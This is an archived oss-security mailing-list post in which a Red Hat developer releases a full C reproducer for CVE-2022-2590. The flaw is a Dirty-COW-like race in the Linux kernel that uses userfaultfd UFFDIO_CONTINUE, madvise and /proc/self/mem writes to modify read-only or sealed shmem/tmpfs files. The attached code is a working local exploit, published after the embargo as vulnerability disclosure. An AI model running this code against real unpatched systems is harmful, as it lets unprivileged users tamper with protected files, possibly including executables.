[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Re: CVE-2022-2590: Linux kernel: Modifying shmem/tmpfs files without write permission
From:       David Hildenbrand <david () redhat ! com>
Date:       2022-08-15 6:59:02
Message-ID: 96f1c805-f41c-6341-5849-2e84b4587f1a () redhat ! com
[Download RAW message or body]

On 08.08.22 09:18, David Hildenbrand wrote:
> Hi,
> 
> I found a security issue (CVE-2022-2590) in the Linux kernel similar to
> Dirty COW (CVE-2016-5195), however, restricted to shared memory (shmem /
> tmpfs). I notified distributions one week ago and the embargo ended today.
> 
> An unprivileged user can modify file content of a shmem (tmpfs) file,
> even if that user does not have write permissions to the file. The file
> could be an executable.
> 
> The introducing upstream commit ID is:
>   9ae0f87d009c ("mm/shmem: unconditionally set pte dirty in
>   mfill_atomic_install_pte")
> 
> Linux >= v5.16 is affected on x86-64 and aarch64 if the kernel is
> compiled with CONFIG_USERFAULTFD=y. For Linux < v5.19 it's sufficient to
> revert the problematic commit, which is possible with minor contextual
> conflicts. For Linux >= v5.19 I'll send a proposal fix today.
> 
> I have a working reproducer that I will post as reply to this mail in
> one week (August 15).
> 

Hi,

attached is the reproducer. When run without arguments, it will test
with a memfd that is sealed for writes.

Upstream, 5.18-stable and 5.19-stable are still to be fixed. The fix is
on its way upstream and is already in -next, so I suppose it should all
be fixed fairly soonish.

-- 
Thanks,

David / dhildenb
["reproducer.c" (text/x-csrc)]

/*
 * This is a reproducer for a new privilege escalation issue, similar to
 * Dirty COW (CVE-2016-5195), introduced by accident into the Linux kernel via:
 *     9ae0f87d009c ("mm/shmem: unconditionally set pte dirty in mfill_atomic_install_pte")
 * Part of Linux v5.16 -- v5.19.
 *
 * In contrast to Dirty COW, it's limited to shmem only. It uses a combination
 * of userfaultfd UFFDIO_CONTINUE and madvise(MADV_DONTNEED) to trick
 * the kernel into not breaking COW, instead allowing modification of a
 * shmem page without write permissions.
 *
 * Example:
 *   $ sudo -s
 *   # rm /tmp/foo
 *   # echo "Shared data" > /tmp/foo
 *   # chmod 0404 /tmp/foo
 *   # exit
 *   $ ls -l /tmp/foo
 *   -r-----r-- 1 root root 12 26. Jul 10:26 /tmp/foo
 *   $ cat /tmp/foo
 *   Shared data
 *   $ gcc -pthread reproducer.c -o reproducer
 *   $ ./reproducer /tmp/foo
 *   Old content:
 *   Shared data
 *
 *   New content:
 *   10:27:53ata
 *   $ cat /tmp/foo
 *   10:27:53ata
 *
 * To reproduce faster, it might help to load the system, for example,
 * using:
 *   $ stress -c `nproc --all`
 * Or running it inside a VM.
 *
 * Details:
 *   We want the following sequence to trigger. Assuming the shared page is
 *   mapped R/O already (e.g., due to previous action from Thread 1):
 *   Thread 2: pwrite() [start]
 *	-> Trigger write fault, replace mapped page by anonymous page
 *	-> COW was broken, remember FOLL_COW
 *   Thread 1: madvise(map, 4096, MADV_DONTNEED);
 *	-> Discard anonymous page
 *   Thread 1: tmp += *((int *)map);
 *	-> Trigger a minor uffd fault
 *   Thread 3: ioctl(uffd, UFFDIO_CONTINUE, ...)
 *	-> Resolve minor uffd fault via UFFDIO_CONTINUE
 *	-> Map shared page R/O but set it dirty
 *   Thread 2: pwrite() [continue]
 *	-> Find R/O mapped page that's dirty and FOLL_COW being set
 *	-> Modify shared page R/O because we don't break COW (again)
 *
 * Dirty COW (CVE-2016-5195) was originally identified by Phil Oester.
 *
 * Thanks to Nadav Amit for pointing out that the pte_dirty() check in
 * FOLL_FORCE code is problematic and might be exploitable.
 *
 * Copyright (C) 2022  Red Hat, Inc.
 * Author(s): David Hildenbrand <david@redhat.com>
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>
#include <stdlib.h>
#include <poll.h>
#include <pthread.h>
#include <time.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>

int mem_fd;
void *map;
volatile int tmp;
int uffd;

char str[80];

/*
 * Thread 1: keep dropping the page behind "map" and immediately reading
 * through the mapping again, so that every round raises a new fault.
 *
 * @arg: unused.
 *
 * Never returns. Terminates the whole process if madvise() fails.
 */
void *discard_thread_fn(void *arg)
{
	for (;;) {
		/* Zap the page so that the next access has to fault again. */
		if (madvise(map, 4096, MADV_DONTNEED) < 0) {
			fprintf(stderr, "madvise() failed: %d\n", errno);
			exit(1);
		}

		/*
		 * Read through the mapping to trigger a UFFD minor fault,
		 * which the uffd thread resolves with UFFDIO_CONTINUE. The
		 * value read is only accumulated into the volatile "tmp".
		 */
		tmp += *(int *)map;
	}
}

/*
 * Thread 2: keep writing "str" through mem_fd at the file offset that
 * corresponds to the address of "map".
 *
 * @arg: unused.
 *
 * Never returns.
 */
void *write_thread_fn(void *arg)
{
	for (;;) {
		/* Offsets in /proc/self/mem are addresses of this process. */
		const off_t where = (uintptr_t) map;

		/*
		 * The result is ignored on purpose: a failure means that
		 * pwrite() would have to trigger a uffd fault and sleep,
		 * which the GUP variant doesn't support, so it fails with
		 * an I/O error.
		 *
		 * A later attempt succeeds once the page has already been
		 * placed via UFFDIO_CONTINUE by the other threads.
		 */
		(void) pwrite(mem_fd, str, strlen(str), where);
	}
}

static void *uffd_thread_fn(void *arg)
{
	static struct uffd_msg msg;   /* Data read from userfaultfd */
	struct uffdio_continue uffdio;
	struct uffdio_range uffdio_wake;
	ssize_t nread;

	while (1) {
		struct pollfd pollfd;
		int nready;

		pollfd.fd = uffd;
		pollfd.events = POLLIN;
		nready = poll(&pollfd, 1, -1);
		if (nready == -1) {
			fprintf(stderr, "poll() failed: %d\n", errno);
			exit(1);
		}

		nread = read(uffd, &msg, sizeof(msg));
		if (nread <= 0)
			continue;

		uffdio.range.start = (unsigned long) map;
		uffdio.range.len = 4096;
		uffdio.mode = 0;
		if (ioctl(uffd, UFFDIO_CONTINUE, &uffdio) < 0) {
			if (errno == EEXIST) {
				uffdio_wake.start = (unsigned long) map;
				uffdio_wake.len = 4096;
				if (ioctl(uffd, UFFDIO_WAKE, &uffdio_wake) < 0) {

				}
			} else {
				fprintf(stderr, "UFFDIO_CONTINUE failed: %d\n", errno);
			}
		}
	}
}

/*
 * Create the userfaultfd, negotiate the API with the shmem minor-fault
 * feature and register the 4096-byte range starting at "map" in minor
 * mode. The resulting descriptor is stored in the global "uffd".
 *
 * Returns 0 on success and a negative errno value on failure (-ENOSYS if
 * the kernel does not report UFFD_FEATURE_MINOR_SHMEM).
 */
static int setup_uffd(void)
{
	struct uffdio_api uffdio_api;
	struct uffdio_register uffdio_register;
	int err;

	uffd = syscall(__NR_userfaultfd,
		       O_CLOEXEC | O_NONBLOCK | UFFD_USER_MODE_ONLY);
	if (uffd < 0) {
		/*
		 * Save errno before calling fprintf(): the latter may
		 * overwrite it, and returning -0 would signal success.
		 */
		err = errno;
		fprintf(stderr, "syscall() failed: %d\n", err);
		return -err;
	}

	uffdio_api.api = UFFD_API;
	uffdio_api.features = UFFD_FEATURE_MINOR_SHMEM;
	if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) {
		err = errno;
		fprintf(stderr, "UFFDIO_API failed: %d\n", err);
		return -err;
	}

	/* The kernel writes the features it actually supports back. */
	if (!(uffdio_api.features & UFFD_FEATURE_MINOR_SHMEM)) {
		fprintf(stderr, "UFFD_FEATURE_MINOR_SHMEM missing\n");
		return -ENOSYS;
	}

	uffdio_register.range.start = (unsigned long) map;
	uffdio_register.range.len = 4096;
	uffdio_register.mode = UFFDIO_REGISTER_MODE_MINOR;
	if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) {
		err = errno;
		fprintf(stderr, "UFFDIO_REGISTER failed: %d\n", err);
		return -err;
	}

	return 0;
}

/*
 * Print the content of @fd, read from offset 0 up to end-of-file, to
 * stdout, followed by a newline.
 *
 * @fd: file descriptor to read from via pread(); its file position is
 *      not used.
 *
 * A pread() failure is reported on stderr and ends the output early; only
 * EINTR is retried. Each chunk is printed as a C string, so output of a
 * chunk stops at the first NUL byte it contains.
 */
static void print_content(int fd)
{
	char buf[80];
	off_t offs = 0;

	while (1) {
		/* Leave room for the terminating NUL added below. */
		ssize_t ret = pread(fd, buf, sizeof(buf) - 1, offs);

		if (ret < 0) {
			if (errno == EINTR)
				continue;
			/* Give up: retrying a persistent error loops forever. */
			fprintf(stderr, "pread() failed: %d\n", errno);
			break;
		}
		if (!ret)
			break;

		buf[ret] = 0;
		printf("%s", buf);
		offs += ret;
	}
	printf("\n");
}

/*
 * Entry point of the reproducer.
 *
 * Without arguments, a memfd containing "Shared data" is created and
 * sealed (grow, shrink, write, seal). With one argument, the named file is
 * opened read-only instead. The first page of that file is mapped
 * privately and read-only, the userfaultfd is set up, and the three worker
 * threads are started. The main thread then polls the file until its
 * beginning equals the prepared "HH:MM:SS" string.
 *
 * Returns 0 once the new content has been observed and printed, 1 on a
 * usage or setup error.
 */
int main(int argc, char *argv[])
{
	pthread_t thread1, thread2, thread3;
	struct tm *time_info;
	time_t current_time;
	/* Deliberately not called "tmp": that would shadow the global. */
	char readback[80];
	size_t len;
	int fd;
	int ret;

	if (argc < 2) {
		const char *shared_str = "Shared data";
		const size_t shared_len = strlen(shared_str);

		printf("Testing with sealed memfd\n");
		fd = memfd_create("test", MFD_ALLOW_SEALING);
		if (fd < 0) {
			fprintf(stderr, "memfd_create() failed: %d\n", errno);
			return 1;
		}
		if (ftruncate(fd, shared_len)) {
			fprintf(stderr, "ftruncate() failed: %d\n", errno);
			return 1;
		}
		if (pwrite(fd, shared_str, shared_len, 0) !=
		    (ssize_t) shared_len) {
			fprintf(stderr, "pwrite() failed: %d\n", errno);
			return 1;
		}
		if (fcntl(fd, F_ADD_SEALS, F_SEAL_GROW | F_SEAL_SHRINK |
			  F_SEAL_WRITE | F_SEAL_SEAL) < 0) {
			fprintf(stderr, "fcntl() failed: %d\n", errno);
			return 1;
		}
	} else if (argc == 2) {
		fd = open(argv[1], O_RDONLY);
		if (fd < 0) {
			fprintf(stderr, "open() failed: %d\n", errno);
			return 1;
		}
	} else {
		fprintf(stderr, "usage: %s target_file\n", argv[0]);
		return 1;
	}

	mem_fd = open("/proc/self/mem", O_RDWR);
	if (mem_fd < 0) {
		fprintf(stderr, "open(/proc/self/mem) failed: %d\n", errno);
		return 1;
	}

	map = mmap(NULL, 4096, PROT_READ, MAP_PRIVATE, fd, 0);
	if (map == MAP_FAILED) {
		fprintf(stderr, "mmap() failed: %d\n", errno);
		return 1;
	}

	if (setup_uffd())
		return 1;

	/* Prepare the string we'll want to store. */
	time(&current_time);
	time_info = localtime(&current_time);
	if (!time_info) {
		fprintf(stderr, "localtime() failed: %d\n", errno);
		return 1;
	}
	/* strftime() returns the string length, or 0 if it did not fit. */
	len = strftime(str, sizeof(str), "%H:%M:%S", time_info);
	if (!len) {
		fprintf(stderr, "strftime() failed\n");
		return 1;
	}

	printf("Old content: \n");
	print_content(fd);

	/* pthread_create() returns the error number instead of setting errno. */
	ret = pthread_create(&thread1, NULL, discard_thread_fn, NULL);
	if (!ret)
		ret = pthread_create(&thread2, NULL, write_thread_fn, NULL);
	if (!ret)
		ret = pthread_create(&thread3, NULL, uffd_thread_fn, NULL);
	if (ret) {
		fprintf(stderr, "pthread_create() failed: %d\n", ret);
		return 1;
	}

	/* Loop until we succeeded with our modification. */
	while (1) {
		/* len < sizeof(readback), so the terminator below fits. */
		ssize_t nread = pread(fd, readback, len, 0);

		if (nread > 0) {
			readback[nread] = 0;
			if (!strcmp(readback, str))
				break;
		}
	}

	printf("New content: \n");
	print_content(fd);

	return 0;
}


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic